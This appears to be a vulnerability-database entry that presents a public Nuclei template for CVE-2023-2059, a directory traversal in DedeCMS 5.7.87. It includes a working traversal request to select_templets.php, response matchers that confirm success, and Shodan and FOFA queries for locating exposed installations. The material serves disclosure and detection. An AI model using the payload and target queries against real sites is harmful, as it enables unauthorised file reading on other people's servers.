漏洞描述
Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.
CVE-2023-2059: DedeCMS 5.7.87 - Directory Traversal
PoC代码[已公开]
id: CVE-2023-2059
info:
name: DedeCMS 5.7.87 - Directory Traversal
author: pussycat0x
severity: medium
description: |
Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.
reference:
- https://github.com/ATZXC-RedTeam/cve/blob/main/dedecms.md
- https://vuldb.com/?ctiid.225944
- https://vuldb.com/?id.225944
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-2059
cwe-id: CWE-28
epss-score: 0.02553
epss-percentile: 0.84975
cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dedecms
product: dedecms
shodan-query:
- http.html:"dedecms"
- cpe:"cpe:2.3:a:dedecms:dedecms"
fofa-query:
- app="DedeCMS"
- app="dedecms"
- body="dedecms"
tags: cve,cve2023,dedecms,lfi
http:
- raw:
- |
GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\..\..\ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "dirname(__FILE__)"
- "$cfg_basedir"
- "dedecms"
condition: and
case-insensitive: true
- type: status
status:
- 200
# digest: 4b0a00483046022100f4e5021b3e322b6cd13d309be6ecf64ff46b9f66d7c645f9865e5ed60d21ed70022100b66bc2e47fc2281284a5fd41a2dd88e162708cff855f35e1efc0b7ad1cd32df7:922c64590222798bb761d5b6d8e72950